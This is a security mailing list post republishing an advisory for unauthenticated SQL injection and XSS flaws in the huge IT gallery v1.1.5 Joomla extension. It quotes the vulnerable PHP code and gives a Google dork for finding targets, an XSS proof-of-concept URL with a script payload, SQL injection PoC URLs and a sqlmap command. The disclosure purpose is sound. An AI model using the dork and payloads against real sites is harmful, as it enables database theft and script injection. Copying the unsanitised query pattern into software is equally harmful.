Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 01 Sep 2016 08:22:11 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Updated: XSS and SQLi in huge IT gallery v1.1.5 for Joomla

I thought I should share this here, this vulnerability doesn't require authentication to exploit it has been fixed in v1.1.6 not v1.1.7.


Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Author: Larry W. Cashdollar, @_larry0 Elitza Neytcheva, @E1337za 
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed v1.1.6
Vendor Contact: info@...e-it.com
Advisory: http://www.vapidlabs.com/advisory.php?v=164
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
Vulnerability:
The attacker does not need to be logged in to Joomla to exploit this vulnerability:

SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51     public function getPropertie() {
52         $db = JFactory::getDBO();
53         $id_cat = JRequest::getVar('id');
54         $query = $db->getQuery(true);
55         $query->select('#__huge_itgallery_images.name as name,'
56                 . '#__huge_itgallery_images.id ,'
57                 . '#__huge_itgallery_gallerys.name as portName,'
58                 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg    allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59         $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg    allery_images'));
60         $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61         $query->order('ordering desc');
62 
64         $db->setQuery($query);
65         $results = $db->loadObjectList();
66         return $results;
67     }

XSS is here:

root@...mla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@...mla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;
256:                    <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >

CVE-2016-1000113 SQLi
CVE-2016-1000114 XSS
Google Dork:
inurl:option=com_gallery inurl:id

Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
 
SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

http://192.168.0.125/index.php?option=com_gallery&id=HERE
 
$ sqlmap -u "http://192.168.0.125/index.php?option=com_gallery&id=*" --dbms mysql

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.